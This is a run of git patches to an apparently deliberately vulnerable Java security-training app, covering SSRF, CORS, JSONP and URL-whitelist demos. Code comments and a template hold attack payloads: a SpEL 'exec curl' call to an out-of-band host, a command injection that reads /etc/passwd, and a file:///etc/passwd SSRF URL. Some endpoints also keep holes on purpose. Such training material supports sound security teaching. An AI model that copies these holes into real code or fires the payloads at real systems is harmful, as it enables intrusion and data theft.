+import org.apache.http.impl.nio.client.CloseableHttpAsyncClient;
+import org.apache.http.impl.nio.client.HttpAsyncClients;
+import org.apache.http.util.EntityUtils;
 import org.jsoup.Jsoup;
 import org.jsoup.nodes.Document;
 import org.slf4j.Logger;
@@ -22,6 +25,7 @@
 import java.net.URI;
 import java.net.URL;
 import java.net.URLConnection;
+import java.util.concurrent.*;
 
 /**
  * @author JoyChou 2020-04-06
@@ -30,14 +34,6 @@ public class HttpUtils {
 
     private static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
 
-
-    /**
-     * https://mvnrepository.com/artifact/commons-httpclient/commons-httpclient
-     * UserAgent is <code>Jakarta Commons-HttpClient/3.1</code>. Last publish at 2007.08.
-     *
-     * @param url http request url
-     * @return response
-     */
     public static String commonHttpClient(String url) {
 
         HttpClient client = new HttpClient();
@@ -138,13 +134,10 @@ public static String HTTPURLConnection(String url) {
      */
     public static String Jsoup(String url) {
         try {
-            String useragent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) " +
-                    "Chrome/64.0.3282.167 Safari/537.36";
             Document doc = Jsoup.connect(url)
-                    .userAgent(useragent)
+                    //.followRedirects(false)
                     .timeout(3000)
                     .cookie("name", "joychou") // request cookies
-                    //.followRedirects(false)
                     .execute().parse();
             return doc.outerHtml();
         } catch (IOException e) {
@@ -186,4 +179,25 @@ public static void IOUtils(String url) {
     }
 
 
+    public static String HttpAsyncClients(String url) {
+        CloseableHttpAsyncClient httpclient = HttpAsyncClients.createDefault();
+        try {
+            httpclient.start();
+            final HttpGet request = new HttpGet(url);
+            Future<HttpResponse> future = httpclient.execute(request, null);
+            HttpResponse response = future.get(6000, TimeUnit.MILLISECONDS);
+            return EntityUtils.toString(response.getEntity());
+        } catch (Exception e) {
+            return e.getMessage();
+        } finally {
+            try {
+                httpclient.close();
+            } catch (Exception e) {
+                logger.error(e.getMessage());
+            }
+        }
+
+    }
+
+
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 8b72592e..c9934946 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -26,7 +26,7 @@ joychou.security.referer.uri = /jsonp/**
 # csrf token check
 joychou.security.csrf.enabled = true
 # URI without CSRF check (only support ANT url format)
-joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**
+joychou.security.csrf.exclude.url = /xxe/**, /fastjson/**, /xstream/**, /ssrf/**
 # method for CSRF check
 joychou.security.csrf.method = POST
 ### csrf configuration ends ###
@@ -36,4 +36,7 @@ joychou.security.csrf.method = POST
 # referer check
 joychou.security.jsonp.referer.check.enabled = true
 joychou.security.jsonp.callback = callback, _callback
-### jsonp configuration ends ###
\ No newline at end of file
+### jsonp configuration ends ###
+
+
+swagger.enable = true
\ No newline at end of file

From ab69c0b60c6746476a9c7be3172867000b8fefa2 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 3 Aug 2020 17:17:33 +0800
Subject: [PATCH 081/108] bug fix

---
 README.md                                             |  1 +
 pom.xml                                               |  2 +-
 .../java/org/joychou/config/SafeDomainParser.java     | 11 +++++------
 src/main/java/org/joychou/controller/SSRF.java        |  7 +------
 .../java/org/joychou/controller/URLWhiteList.java     |  7 +++++--
 .../org/joychou/security/CsrfAccessDeniedHandler.java |  7 +++----
 .../java/org/joychou/security/ssrf/SSRFChecker.java   |  2 +-
 src/main/java/org/joychou/util/HttpUtils.java         | 10 ++++++++--
 src/main/resources/templates/index.html               |  1 +
 9 files changed, 26 insertions(+), 22 deletions(-)

diff --git a/README.md b/README.md
index 2c0a0bc8..56d10960 100644
--- a/README.md
+++ b/README.md
@@ -40,6 +40,7 @@ Sort by letter.
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+- [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/pom.xml b/pom.xml
index 6e5c2455..2b273bad 100644
--- a/pom.xml
+++ b/pom.xml
@@ -7,7 +7,7 @@
     <groupId>sec</groupId>
     <artifactId>java-sec-code</artifactId>
     <version>1.0.0</version>
-    <packaging>war</packaging>
+    <packaging>jar</packaging>
 
     <properties>
         <maven.compiler.source>1.8</maven.compiler.source> <!-- mvn clean package-->
diff --git a/src/main/java/org/joychou/config/SafeDomainParser.java b/src/main/java/org/joychou/config/SafeDomainParser.java
index 6157f645..b92ff9eb 100644
--- a/src/main/java/org/joychou/config/SafeDomainParser.java
+++ b/src/main/java/org/joychou/config/SafeDomainParser.java
@@ -29,11 +29,9 @@ public SafeDomainParser() {
         try {
             // 读取resources目录下的文件
             ClassPathResource resource = new ClassPathResource(safeDomainClassPath);
-            File file = resource.getFile();
-
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            Document doc = db.parse(file);  // parse xml
+            Document doc = db.parse(resource.getInputStream());  // parse xml
 
             NodeList rootNode = doc.getElementsByTagName(rootTag);  // 解析根节点domains
             Node domainsNode = rootNode.item(0);
@@ -68,6 +66,7 @@ public SafeDomainParser() {
 
         WebConfig wc = new WebConfig();
         wc.setSafeDomains(safeDomains);
+        logger.info(safeDomains.toString());
         wc.setBlockDomains(blockDomains);
 
         // 解析SSRF配置
@@ -86,11 +85,10 @@ public SafeDomainParser() {
         try {
             // 读取resources目录下的文件
             ClassPathResource resource = new ClassPathResource(ssrfSafeDomainClassPath);
-            File file = resource.getFile();
-
             DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
             DocumentBuilder db = dbf.newDocumentBuilder();
-            Document doc = db.parse(file);  // parse xml
+            // 修复打包成jar包运行，不能读取文件的bug
+            Document doc = db.parse(resource.getInputStream());  // parse xml
 
             NodeList rootNode = doc.getElementsByTagName(ssrfRootTag);  // 解析根节点
             Node domainsNode = rootNode.item(0);
@@ -130,6 +128,7 @@ public SafeDomainParser() {
             logger.error(e.toString());
         }
 
+        logger.info(ssrfBlockIps.toString());
         wc.setSsrfBlockDomains(ssrfBlockDomains);
         wc.setSsrfBlockIps(ssrfBlockIps);
         wc.setSsrfSafeDomains(ssrfSafeDomains);
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index a98c9952..9fdf757f 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -150,23 +150,18 @@ public String ImageIO(@RequestParam String url) {
     }
 
 
-    /**
-     * The default setting of followRedirects is true.
-     * UserAgent is <code>okhttp/2.5.0</code>.
-     */
     @GetMapping("/okhttp/sec")
     public String okhttp(@RequestParam String url) {
 
         try {
             SecurityUtil.startSSRFHook();
-            HttpUtils.okhttp(url);
+            return HttpUtils.okhttp(url);
         } catch (SSRFException | IOException e) {
             return e.getMessage();
         } finally {
             SecurityUtil.stopSSRFHook();
         }
 
-        return "okhttp ssrf test";
     }
 
 
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index b4d3c2f0..e6f9b987 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -6,6 +6,8 @@
 import org.slf4j.LoggerFactory;
 import org.springframework.web.bind.annotation.*;
 
+import java.net.MalformedURLException;
+import java.net.URL;
 import java.util.ArrayList;
 import java.util.regex.Matcher;
 import java.util.regex.Pattern;
@@ -92,7 +94,7 @@ public String regex(@RequestParam("url") String url) {
      * More details: https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass
      */
     @GetMapping("/vuln/url_bypass")
-    public String url_bypass(String url) {
+    public String url_bypass(String url) throws MalformedURLException {
 
         logger.info("url:  " + url);
 
@@ -100,7 +102,8 @@ public String url_bypass(String url) {
             return "Url is not http or https";
         }
 
-        String host = SecurityUtil.gethost(url);
+        URL u = new URL(url);
+        String host = u.getHost();
         logger.info("host:  " + host);
 
         // endsWith .
diff --git a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
index ba9c3f7f..2e1df795 100644
--- a/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
+++ b/src/main/java/org/joychou/security/CsrfAccessDeniedHandler.java
@@ -7,15 +7,14 @@
 import org.springframework.security.access.AccessDeniedException;
 import org.springframework.security.web.access.AccessDeniedHandler;
 
-
-import javax.servlet.ServletException;
 import javax.servlet.http.HttpServletRequest;
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
 /**
- * Design csrf access denied page.
+ * Csrf access denied page.
  *
+ * @author JoyChou
  */
 public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
@@ -23,7 +22,7 @@ public class CsrfAccessDeniedHandler implements AccessDeniedHandler {
 
     @Override
     public void handle(HttpServletRequest request, HttpServletResponse response,
-                       AccessDeniedException accessDeniedException) throws IOException, ServletException {
+                       AccessDeniedException accessDeniedException) throws IOException {
 
         logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t" +
                 "Referer: " + request.getHeader("referer"));
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 4ef0f046..01b1b350 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -50,7 +50,7 @@ public static boolean checkURLFckSSRF(String url) {
     /**
      * 解析url的ip，判断ip是否是内网ip，所以TTL设置为0的情况不适用。
      * url只允许https或者http，并且设置默认连接超时时间。
-     * 该修复方案会主动请求重定向后的链接。最好用Hook方式获取到所有url后，进行判断，代码待续…
+     * 该修复方案会主动请求重定向后的链接。
      *
      * @param url        check的url
      * @param checkTimes 设置重定向检测的最大次数，建议设置为10次
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 571680a2..1f92cfb9 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -146,10 +146,16 @@ public static String Jsoup(String url) {
     }
 
 
-    public static void okhttp(String url) throws IOException {
+    /**
+     * The default setting of followRedirects is true. The option of followRedirects is true.
+     *
+     * UserAgent is <code>okhttp/2.5.0</code>.
+     */
+    public static String okhttp(String url) throws IOException {
         OkHttpClient client = new OkHttpClient();
+        // client.setFollowRedirects(false);
         com.squareup.okhttp.Request ok_http = new com.squareup.okhttp.Request.Builder().url(url).build();
-        client.newCall(ok_http).execute();
+        return client.newCall(ok_http).execute().body().string();
     }
 
 
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 671045d5..72779b8e 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -8,6 +8,7 @@
     <p>Hello <span th:text="${user}"></span>.</p>
     <p>Welcome to login java-sec-code application. <a th:href="@{/appInfo}">Application Infomation</a></p>
     <p>
+        <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
         <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;

From 30dd98b81a6795f7f577ae0f2fde56680404395b Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 3 Aug 2020 17:49:12 +0800
Subject: [PATCH 082/108] fixes #23

---
 src/main/resources/templates/login.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/src/main/resources/templates/login.html b/src/main/resources/templates/login.html
index dc6ee40f..1a4c4225 100644
--- a/src/main/resources/templates/login.html
+++ b/src/main/resources/templates/login.html
@@ -8,7 +8,7 @@
     <meta name="_csrf_headerName" th:content="${_csrf.headerName}" />
     <meta name="_csrf_parameterName" th:content="${_csrf.parameterName}" />
     <link rel="stylesheet" th:href="@{/css/login.css}" type="text/css" />
-    <script th:src="@{https://code.jquery.com/jquery-3.4.1.min.js}"></script>
+    <script th:src="@{https://cdn.jsdelivr.net/npm/jquery@3.4.1/dist/jquery.min.js}"></script>
 
     <script>
         window.csrfToken = {

From 37925a8501e258cbd78cd760ed33d134bbd6e574 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 5 Feb 2021 17:29:35 +0800
Subject: [PATCH 083/108] add fastjsonp

---
 pom.xml                                       |  9 ++++
 .../java/org/joychou/config/Constants.java    |  1 +
 .../org/joychou/config/CsrfTokenBean.java     | 18 ++++++++
 .../org/joychou/config/CustomCorsConfig.java  |  2 +-
 .../{security => config}/Object2Jsonp.java    | 16 ++++---
 .../java/org/joychou/controller/Cookies.java  |  4 ++
 .../java/org/joychou/controller/Cors.java     |  4 +-
 .../java/org/joychou/controller/Jsonp.java    | 37 ++++++++++++++--
 .../java/org/joychou/controller/SSRF.java     |  3 ++
 .../java/org/joychou/controller/SpEL.java     |  2 +-
 .../org/joychou/controller/URLWhiteList.java  | 43 +++++--------------
 .../java/org/joychou/filter/ReferFilter.java  |  2 +-
 .../joychou/security/CustomCorsProcessor.java |  7 +--
 src/main/java/org/joychou/util/HttpUtils.java |  5 ++-
 14 files changed, 100 insertions(+), 53 deletions(-)
 create mode 100644 src/main/java/org/joychou/config/CsrfTokenBean.java
 rename src/main/java/org/joychou/{security => config}/Object2Jsonp.java (85%)

diff --git a/pom.xml b/pom.xml
index 2b273bad..6f8f3990 100644
--- a/pom.xml
+++ b/pom.xml
@@ -248,6 +248,15 @@
             <version>2.9.2</version>
         </dependency>
 
+        <!-- https://mvnrepository.com/artifact/org.projectlombok/lombok -->
+        <dependency>
+            <groupId>org.projectlombok</groupId>
+            <artifactId>lombok</artifactId>
+            <version>1.18.16</version>
+            <scope>provided</scope>
+        </dependency>
+
+
     </dependencies>
 
     <dependencyManagement>
diff --git a/src/main/java/org/joychou/config/Constants.java b/src/main/java/org/joychou/config/Constants.java
index ef6ee45e..041f4f80 100644
--- a/src/main/java/org/joychou/config/Constants.java
+++ b/src/main/java/org/joychou/config/Constants.java
@@ -6,4 +6,5 @@ private Constants() {
     }
 
     public static final String REMEMBER_ME_COOKIE = "rememberMe";
+    public static final String ERROR_PAGE = "https://test.joychou.org/error1.html";
 }
diff --git a/src/main/java/org/joychou/config/CsrfTokenBean.java b/src/main/java/org/joychou/config/CsrfTokenBean.java
new file mode 100644
index 00000000..b0698e12
--- /dev/null
+++ b/src/main/java/org/joychou/config/CsrfTokenBean.java
@@ -0,0 +1,18 @@
+package org.joychou.config;
+
+import org.springframework.context.annotation.Bean;
+import org.springframework.context.annotation.Configuration;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
+
+/**
+ * Reference: https://docs.spring.io/spring-security/site/docs/5.0.x/reference/html/csrf.html
+ */
+
+@Configuration
+public class CsrfTokenBean {
+
+    @Bean
+    public CookieCsrfTokenRepository cookieCsrfTokenRepository() {
+        return CookieCsrfTokenRepository.withHttpOnlyFalse();
+    }
+}
diff --git a/src/main/java/org/joychou/config/CustomCorsConfig.java b/src/main/java/org/joychou/config/CustomCorsConfig.java
index 8b80e664..47d3acea 100644
--- a/src/main/java/org/joychou/config/CustomCorsConfig.java
+++ b/src/main/java/org/joychou/config/CustomCorsConfig.java
@@ -38,7 +38,7 @@ public RequestMappingHandlerMapping getRequestMappingHandlerMapping() {
 
 
     /**
-     * 自定义Cors处理器
+     * 自定义Cors处理器，重写了checkOrigin
      * 自定义校验origin，支持一级域名校验 && 多级域名
      */
     private static class CustomRequestMappingHandlerMapping extends RequestMappingHandlerMapping {
diff --git a/src/main/java/org/joychou/security/Object2Jsonp.java b/src/main/java/org/joychou/config/Object2Jsonp.java
similarity index 85%
rename from src/main/java/org/joychou/security/Object2Jsonp.java
rename to src/main/java/org/joychou/config/Object2Jsonp.java
index 6432616b..64d68205 100644
--- a/src/main/java/org/joychou/security/Object2Jsonp.java
+++ b/src/main/java/org/joychou/config/Object2Jsonp.java
@@ -1,7 +1,7 @@
-package org.joychou.security;
+package org.joychou.config;
 
 import org.apache.commons.lang.StringUtils;
-import org.joychou.config.WebConfig;
+import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
 import org.springframework.beans.factory.annotation.Value;
@@ -19,6 +19,7 @@
 import javax.servlet.http.HttpServletResponse;
 
 
+
 /**
  * <code>AbstractJsonpResponseBodyAdvice</code> will be removed as of Spring Framework 5.1, use CORS instead.
  * Since Spring Framework 4.1. Springboot 2.1.0 RELEASE use spring framework 5.1.2
@@ -47,7 +48,8 @@ protected void beforeBodyWriteInternal(MappingJacksonValue bodyContainer, MediaT
         HttpServletResponse response = ((ServletServerHttpResponse)res).getServletResponse();
 
         String realJsonpFunc = getRealJsonpFunc(request);
-        if (StringUtils.isNotBlank(realJsonpFunc)){
+        // 如果url带callback，且校验不安全后
+        if ( StringUtils.isNotBlank(realJsonpFunc) ) {
             jsonpReferHandler(request, response);
         }
         super.beforeBodyWriteInternal(bodyContainer, contentType, returnType, req, res);
@@ -84,9 +86,11 @@ private void jsonpReferHandler(HttpServletRequest request, HttpServletResponse r
         if (SecurityUtil.checkURL(refer) == null ){
             logger.error("[-] URL: " + url + "?" + query + "\t" + "Referer: " + refer);
             try{
-                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
-                response.flushBuffer();
+                // 使用response.getWriter().write后，后续写入jsonp后还会继续使用response.getWriteer()，导致报错
+//                response.setStatus(HttpServletResponse.SC_FORBIDDEN);
+//                response.getWriter().write(" Referer check error.");
+//                response.flushBuffer();
+                response.sendRedirect(Constants.ERROR_PAGE);
             } catch (Exception e){
                 logger.error(e.toString());
             }
diff --git a/src/main/java/org/joychou/controller/Cookies.java b/src/main/java/org/joychou/controller/Cookies.java
index f62efb2d..6f0c7be2 100644
--- a/src/main/java/org/joychou/controller/Cookies.java
+++ b/src/main/java/org/joychou/controller/Cookies.java
@@ -12,6 +12,10 @@
 
 import static org.springframework.web.util.WebUtils.getCookie;
 
+
+/**
+ * 某些应用获取用户身份信息可能会直接从cookie中直接获取明文的nick或者id，导致越权问题。
+ */
 @RestController
 @RequestMapping("/cookie")
 public class Cookies {
diff --git a/src/main/java/org/joychou/controller/Cors.java b/src/main/java/org/joychou/controller/Cors.java
index 870e809f..5b7d9741 100644
--- a/src/main/java/org/joychou/controller/Cors.java
+++ b/src/main/java/org/joychou/controller/Cors.java
@@ -25,8 +25,8 @@ public class Cors {
     @GetMapping("/vuln/origin")
     public String vuls1(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("origin");
-        response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
-        response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
+        response.setHeader("Access-Control-Allow-Origin", origin); // set origin from header
+        response.setHeader("Access-Control-Allow-Credentials", "true");  // allow cookie
         return info;
     }
 
diff --git a/src/main/java/org/joychou/controller/Jsonp.java b/src/main/java/org/joychou/controller/Jsonp.java
index 96061579..2ab0dcef 100644
--- a/src/main/java/org/joychou/controller/Jsonp.java
+++ b/src/main/java/org/joychou/controller/Jsonp.java
@@ -3,9 +3,14 @@
 import com.alibaba.fastjson.JSON;
 import com.alibaba.fastjson.JSONObject;
 
+import com.alibaba.fastjson.JSONPObject;
+import lombok.extern.slf4j.Slf4j;
+import org.apache.commons.lang.StringUtils;
 import org.joychou.security.SecurityUtil;
 import org.joychou.util.LoginUtils;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
+import org.springframework.security.web.csrf.CookieCsrfTokenRepository;
 import org.springframework.security.web.csrf.CsrfToken;
 import org.springframework.web.bind.annotation.*;
 import org.springframework.web.servlet.ModelAndView;
@@ -14,6 +19,7 @@
 import org.joychou.util.WebUtils;
 
 import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
 import java.security.Principal;
 
 
@@ -22,12 +28,15 @@
  * https://github.com/JoyChou93/java-sec-code/wiki/JSONP
  */
 
+@Slf4j
 @RestController
 @RequestMapping("/jsonp")
 public class Jsonp {
 
     private String callback = WebConfig.getBusinessCallback();
 
+    @Autowired
+    CookieCsrfTokenRepository cookieCsrfTokenRepository;
     /**
      * Set the response content-type to application/javascript.
      * <p>
@@ -57,7 +66,7 @@ public String emptyReferer(HttpServletRequest request) {
     }
 
     /**
-     * Adding callback or cback on parameter can automatically return jsonp data.
+     * Adding callback or _callback on parameter can automatically return jsonp data.
      * http://localhost:8080/jsonp/object2jsonp?callback=test
      * http://localhost:8080/jsonp/object2jsonp?_callback=test
      *
@@ -101,11 +110,33 @@ public String safecode(HttpServletRequest request) {
         return WebUtils.json2Jsonp(callback, LoginUtils.getUserInfo2JsonStr(request));
     }
 
-
+    /**
+     * http://localhost:8080/jsonp/getToken?fastjsonpCallback=aa
+     *
+     * object to jsonp
+     */
     @GetMapping("/getToken")
-    public CsrfToken getCsrfToken(CsrfToken token) {
+    public CsrfToken getCsrfToken1(CsrfToken token) {
         return token;
     }
 
+    /**
+     * http://localhost:8080/jsonp/fastjsonp/getToken?fastjsonpCallback=aa
+     *
+     * fastjsonp to jsonp
+     */
+    @GetMapping(value = "/fastjsonp/getToken", produces = "application/javascript")
+    public String getCsrfToken2(HttpServletRequest request) {
+        CsrfToken csrfToken = cookieCsrfTokenRepository.loadToken(request); // get csrf token
+
+        String callback = request.getParameter("fastjsonpCallback");
+        if (StringUtils.isNotBlank(callback)) {
+            JSONPObject jsonpObj = new JSONPObject(callback);
+            jsonpObj.addParameter(csrfToken);
+            return jsonpObj.toString();
+        } else {
+            return csrfToken.toString();
+        }
+    }
 
 }
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 9fdf757f..8645fd13 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -27,7 +27,10 @@ public class SSRF {
 
 
     /**
+     * http://localhost:8080/ssrf/urlConnection/vuln?url=file:///etc/passwd
+     *
      * The default setting of followRedirects is true.
+     * Protocol: file ftp mailto http https jar netdoc
      * UserAgent is Java/1.8.0_102.
      */
     @RequestMapping(value = "/urlConnection/vuln", method = {RequestMethod.POST, RequestMethod.GET})
diff --git a/src/main/java/org/joychou/controller/SpEL.java b/src/main/java/org/joychou/controller/SpEL.java
index 82163ab2..698f4a7e 100644
--- a/src/main/java/org/joychou/controller/SpEL.java
+++ b/src/main/java/org/joychou/controller/SpEL.java
@@ -16,7 +16,7 @@
 public class SpEL {
 
     /**
-     * SPEL to RCE
+     * SpEL to RCE
      * http://localhost:8080/spel/vul/?expression=xxx.
      * xxx is urlencode(exp)
      * exp: T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index e6f9b987..35d37576 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -118,13 +118,13 @@ public String url_bypass(String url) throws MalformedURLException {
 
 
     /**
-     * 一级域名白名单 First-level host whitelist.
-     * http://localhost:8080/url/sec/endswith?url=http://aa.joychou.org
+     * First-level & Multi-level host whitelist.
+     * http://localhost:8080/url/sec?url=http://aa.joychou.org
      */
-    @GetMapping("/sec/endswith")
-    public String sec_endswith(@RequestParam("url") String url) {
+    @GetMapping("/sec")
+    public String sec(@RequestParam("url") String url) {
 
-        String whiteDomainlists[] = {"joychou.org", "joychou.com"};
+        String whiteDomainlists[] = {"joychou.org", "joychou.com", "test.joychou.me"};
 
         if (!SecurityUtil.isHttp(url)) {
             return "SecurityUtil is not http or https";
@@ -132,42 +132,19 @@ public String sec_endswith(@RequestParam("url") String url) {
 
         String host = SecurityUtil.gethost(url);
 
-        // endsWith .
-        for (String domain : whiteDomainlists) {
-            if (host.endsWith("." + domain)) {
-                return "Good url.";
+        for (String whiteHost: whiteDomainlists){
+            if (whiteHost.startsWith(".") && host.endsWith(whiteHost)) {
+                return url;
+            } else if (!whiteHost.startsWith(".") && host.equals(whiteHost)) {
+                return url;
             }
         }
 
         return "Bad url.";
     }
 
-    /**
-     * 多级域名白名单 Multi-level host whitelist.
-     * http://localhost:8080/url/sec/multi_level_hos?url=http://ccc.bbb.joychou.org
-     */
-    @GetMapping("/sec/multi_level_host")
-    public String sec_multi_level_host(@RequestParam("url") String url) {
-        String whiteDomainlists[] = {"aaa.joychou.org", "ccc.bbb.joychou.org"};
-
-        if (!SecurityUtil.isHttp(url)) {
-            return "SecurityUtil is not http or https";
-        }
-
-        String host = SecurityUtil.gethost(url);
-
-        // equals
-        for (String domain : whiteDomainlists) {
-            if (host.equals(domain)) {
-                return "Good url.";
-            }
-        }
-        return "Bad url.";
-    }
-
 
     /**
-     * 多级域名白名单 Multi-level host whitelist.
      * http://localhost:8080/url/sec/array_indexOf?url=http://ccc.bbb.joychou.org
      */
     @GetMapping("/sec/array_indexOf")
diff --git a/src/main/java/org/joychou/filter/ReferFilter.java b/src/main/java/org/joychou/filter/ReferFilter.java
index da1030e6..30a914f3 100644
--- a/src/main/java/org/joychou/filter/ReferFilter.java
+++ b/src/main/java/org/joychou/filter/ReferFilter.java
@@ -68,7 +68,7 @@ public void doFilter(ServletRequest req, ServletResponse res, FilterChain filter
                 logger.info("[-] URL: " + request.getRequestURL() + "?" + request.getQueryString() + "\t"
                         + "Referer: " + refer);
                 response.setStatus(HttpServletResponse.SC_FORBIDDEN);
-                response.getWriter().write("forbidden");
+                response.getWriter().write(" Referer check error.");
                 response.flushBuffer();
                 return;
             }
diff --git a/src/main/java/org/joychou/security/CustomCorsProcessor.java b/src/main/java/org/joychou/security/CustomCorsProcessor.java
index cbbad17a..6d67825f 100644
--- a/src/main/java/org/joychou/security/CustomCorsProcessor.java
+++ b/src/main/java/org/joychou/security/CustomCorsProcessor.java
@@ -3,12 +3,9 @@
 import org.apache.commons.lang.StringUtils;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
-import org.springframework.util.CollectionUtils;
 import org.springframework.web.cors.CorsConfiguration;
 import org.springframework.web.cors.DefaultCorsProcessor;
 
-import java.util.List;
-
 public class CustomCorsProcessor extends DefaultCorsProcessor {
 
     private static final Logger logger = LoggerFactory.getLogger(CustomCorsProcessor.class);
@@ -29,7 +26,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
         if (result != null) {
             return result;
         }
-        // List<String> allowedOrigins = config.getAllowedOrigins();
+
         if (StringUtils.isBlank(requestOrigin)) {
             return null;
         }
@@ -39,7 +36,7 @@ protected String checkOrigin(CorsConfiguration config, String requestOrigin) {
 
 
     /**
-     * 校验requestOrigin
+     * 自定义校验requestOrigin
      */
     private String customCheckOrigin(String requestOrigin) {
 
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 1f92cfb9..4d2be1a4 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -5,6 +5,7 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
+import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -70,6 +71,8 @@ public static String httpClient(String url) {
 
             CloseableHttpClient client = HttpClients.createDefault();
             HttpGet httpGet = new HttpGet(url);
+            // set redirect enable false
+            // httpGet.setConfig(RequestConfig.custom().setRedirectsEnabled(false).build());
             HttpResponse httpResponse = client.execute(httpGet); // send request
             BufferedReader rd = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
 
@@ -91,6 +94,7 @@ public static String URLConnection(String url) {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
             BufferedReader in = new BufferedReader(new InputStreamReader(urlConnection.getInputStream())); //send request
+            // BufferedReader in = new BufferedReader(new InputStreamReader(u.openConnection().getInputStream()));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -205,5 +209,4 @@ public static String HttpAsyncClients(String url) {
 
     }
 
-
 }

From bb94a99ac62de94796eb3724708896e7e6d44596 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 25 Feb 2021 10:18:21 +0800
Subject: [PATCH 084/108] fixes #31

---
 java-sec-code.iml                             |  1 +
 .../org/joychou/controller/FileUpload.java    | 56 +++++++++++--------
 src/main/resources/application.properties     |  8 ++-
 src/main/resources/templates/index.html       |  3 +-
 .../resources/templates/uploadStatus.html     | 10 ++++
 5 files changed, 52 insertions(+), 26 deletions(-)
 create mode 100644 src/main/resources/templates/uploadStatus.html

